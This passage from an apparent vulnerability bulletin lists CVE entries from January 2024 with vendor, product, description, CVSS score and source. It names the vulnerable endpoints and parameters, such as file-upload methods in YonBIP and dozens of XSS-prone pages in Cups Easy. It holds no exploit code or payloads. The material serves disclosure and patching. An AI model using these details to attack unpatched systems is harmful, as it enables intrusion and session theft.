Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WP Overnight PDF Invoices & Packing Slips for WooCommerce. This issue affects PDF Invoices & Packing Slips for WooCommerce: from n/a through 3.7.5. | 2024-01-27 | 7.6 | CVE-2024-22147 audit@patchstack.com |
| xlightftpd — xlight_ftp_server | A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560. | 2024-01-19 | 7.5 | CVE-2024-0737 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| xpand-it — write-back_manager | An arbitrary file upload vulnerability in Xpand IT Write-back Manager v2.3.1 allows attackers to execute arbitrary code via a crafted jsp file. | 2024-01-19 | 9.8 | CVE-2023-27168 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
| yonyou — yonbip | An issue in yonyou YonBIP v3_23.05 allows a remote attacker to execute arbitrary code via a crafted script to the ServiceDispatcherServlet uap.framework.rc.itf.IResourceManager component. | 2024-01-20 | 9.8 | CVE-2023-51906 cve@mitre.org cve@mitre.org cve@mitre.org |
| yonyou — yonbip | An arbitrary file upload vulnerability in the uap.framework.rc.itf.IResourceManager interface of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-01-20 | 9.8 | CVE-2023-51924 cve@mitre.org cve@mitre.org cve@mitre.org |
| yonyou — yonbip | An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-01-20 | 9.8 | CVE-2023-51925 cve@mitre.org cve@mitre.org cve@mitre.org |
| yonyou — yonbip | YonBIP v3_23.05 was discovered to contain a SQL injection vulnerability via the com.yonyou.hrcloud.attend.web.AttendScriptController.runScript() method. | 2024-01-20 | 9.8 | CVE-2023-51927 cve@mitre.org cve@mitre.org cve@mitre.org |
| yonyou — yonbip | An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file. | 2024-01-20 | 9.8 | CVE-2023-51928 cve@mitre.org cve@mitre.org cve@mitre.org |
| yonyou — yonbip | YonBIP v3_23.05 was discovered to contain an arbitrary file read vulnerability via the nc.bs.framework.comn.serv.CommonServletDispatcher component. | 2024-01-20 | 7.5 | CVE-2023-51926 cve@mitre.org cve@mitre.org cve@mitre.org |
Medium Vulnerabilities
| Primary Vendor — Product |
Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| BORGChat — borgchat  |
A vulnerability, which was classified as problematic, was found in BORGChat 1.0.0 Build 438. This affects an unknown part of the component Service Port 7551. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252039. | 2024-01-25 | 5.3 | CVE-2024-0888 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| actidata — actinas_sl_2u-8_rdx_firmware | Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML. | 2024-01-19 | 6.1 | CVE-2023-51946 cve@mitre.org cve@mitre.org cve@mitre.org |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodemodify.php, in multiple parameters. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-25 | 6.1 | CVE-2024-23855 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemlist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23856 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23857 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23858 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelinecreate.php, in the flatamount parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23859 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23860 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/unitofmeasurementcreate.php, in the unitofmeasurementid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23861 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grndisplay.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23862 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuredisplay.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23863 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23864 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23865 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrycreate.php, in the countryid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23866 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statecreate.php, in the stateid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23867 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlist.php, in the deleted parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23868 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuanceprint.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23869 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelist.php, in the delete parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23870 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/unitofmeasurementmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23871 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23872 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencymodify.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23873 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/companymodify.php, in the address1 parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23874 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancedisplay.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23875 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurecreate.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23876 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencycreate.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23877 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnprint.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23878 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statemodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23879 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23880 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23881 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodecreate.php, in the taxcodeid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23882 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuremodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23883 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnmodify.php, in the grndate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23884 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrymodify.php, in the countryid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23885 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemmodify.php, in the bincardinfo parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23886 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grncreate.php, in the grndate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23887 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stocktransactionslist.php, in the itemidy parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23888 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemgroupcreate.php, in the itemgroupid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23889 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itempopup.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23890 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemcreate.php, in the itemid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23891 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentercreate.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23892 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentermodify.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23893 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancecreate.php, in the issuancedate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23894 cve-coordination@incibe.es |
| ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stock.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23896 cve-coordination@incibe.es |
| amazon — aws_encryption_sdk | AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures. | 2024-01-19 | 5.3 | CVE-2024-23680 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| any-capture — any_sound_recorder  |
A vulnerability was found in Any-Capture Any Sound Recorder 2.93. It has been declared as problematic. This vulnerability affects unknown code of the component Registration Handler. The manipulation of the argument User Name/Key Code leads to memory corruption. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-251674 is the identifier assigned to this vulnerability. | 2024-01-22 | 5.3 | CVE-2024-0774 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| apache — tomcat | Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue. | 2024-01-19 | 5.3 | CVE-2024-21733 security@apache.org security@apache.org |
| apple — ipados | An access issue was addressed with improved access restrictions. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A maliciously crafted webpage may be able to fingerprint the user. | 2024-01-23 | 6.5 | CVE-2024-23206 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ipados | A privacy issue was addressed with improved handling of files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access sensitive user data. | 2024-01-23 | 6.2 | CVE-2024-23223 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ipados | This issue was addressed by removing the vulnerable code. This issue is fixed in tvOS 17, watchOS 10, macOS Sonoma 14, iOS 17 and iPadOS 17, macOS Ventura 13.6.4. An app may be able to bypass Privacy preferences. | 2024-01-23 | 5.5 | CVE-2023-40528 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ipados | The issue was addressed with improved checks. This issue is fixed in iOS 16.7.5 and iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 and iPadOS 17.2. Processing a maliciously crafted image may result in disclosure of process memory. | 2024-01-23 | 5.5 | CVE-2023-42888 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — ipados | This issue was addressed with improved redaction of sensitive information. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to access sensitive user data. | 2024-01-23 | 5.5 | CVE-2024-23207 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — macos | An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2. An app may be able to read arbitrary files. | 2024-01-23 | 6.3 | CVE-2023-42887 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| apple — macos | The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.3, macOS Ventura 13.6.4. An app may be able to access sensitive user data. | 2024-01-23 | 5.5 | CVE-2024-23224 product-security@apple.com product-security@apple.com product-security@apple.com product-security@apple.com |
| autolab — eventprime  |
Autolab is a course management service that enables instructors to offer autograded programming assignments to their students over the Web. Path traversal vulnerabilities were discovered in Autolab’s assessment functionality in versions of Autolab prior to 2.12.0, whereby instructors can perform arbitrary file reads. Version 2.12.0 contains a patch. There are no feasible workarounds for this issue. | 2024-01-22 | 4.9 | CVE-2023-44395 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| beijing_baichuo — smart_s210_management_platform  |
A vulnerability has been found in Beijing Baichuo Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 6.3 | CVE-2024-0939 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| benbusby — whoogle_search  |
Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a `GET` request on lines 339-343 in `requests.py`. The returned contents of the URL are then passed to and reflected back to the user in the `send_file` function on line 484, together with the user-controlled `src_type`, which allows the attacker to control the HTTP response content type leading to a cross-site scripting vulnerability. An attacker could craft a special URL to point to a malicious website and send the link to a victim. The fact that the link would contain a trusted domain (e.g. from one of public Whoogle instances) could be used to trick the user into clicking the link.The malicious website could, for example, be a copy of a real website, meant to steal a person’s credentials to the website, or trick that person in another way. Version 0.8.4 contains a patch for this issue. | 2024-01-23 | 6.1 | CVE-2024-22417 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| benbusby — whoogle_search  |
Whoogle Search is a self-hosted metasearch engine. Versions 0.8.3 and prior have a limited file write vulnerability when the configuration options in Whoogle are enabled. The `config` function in `app/routes.py` does not validate the user-controlled `name` variable on line 447 and `config_data` variable on line 437. The `name` variable is insecurely concatenated in `os.path.join`, leading to path manipulation. The POST data from the `config_data` variable is saved with `pickle.dump` which leads to a limited file write. However, the data that is saved is earlier transformed into a dictionary and the `url` key value pair is added before the file is saved on the system. All in all, the issue allows us to save and overwrite files on the system that the application has permissions to, with a dictionary containing arbitrary data and the `url` key value, which is a limited file write. Version 0.8.4 contains a patch for this issue. | 2024-01-23 | 5.3 | CVE-2024-22204 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| byzoro — smart_s150_firmware | A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 5.3 | CVE-2024-0716 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| canonical_ltd. — ubuntu_pipewire-pulse  |
Ubuntu’s pipewire-pulse in snap grants microphone access even when the snap interface for audio-record is not set. | 2024-01-24 | 5.5 | CVE-2022-4964 security@ubuntu.com security@ubuntu.com security@ubuntu.com security@ubuntu.com |
| cisco — cisco_small_business_smart_and_managed_switches  |
A vulnerability with the access control list (ACL) management within a stacked switch configuration of Cisco Business 250 Series Smart Switches and Business 350 Series Managed Switches could allow an unauthenticated, remote attacker to bypass protection offered by a configured ACL on an affected device. This vulnerability is due to incorrect processing of ACLs on a stacked configuration when either the primary or backup switches experience a full stack reload or power cycle. An attacker could exploit this vulnerability by sending crafted traffic through an affected device. A successful exploit could allow the attacker to bypass configured ACLs, causing traffic to be dropped or forwarded in an unexpected manner. The attacker does not have control over the conditions that result in the device being in the vulnerable state. Note: In the vulnerable state, the ACL would be correctly applied on the primary devices but could be incorrectly applied to the backup devices. | 2024-01-26 | 5.8 | CVE-2024-20263 ykramarz@cisco.com |
| cisco — cisco_unity_connection  |
A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. | 2024-01-26 | 4.8 | CVE-2024-20305 ykramarz@cisco.com |
| code-projects — social_networking_site | A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability. | 2024-01-19 | 5.4 | CVE-2024-0722 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
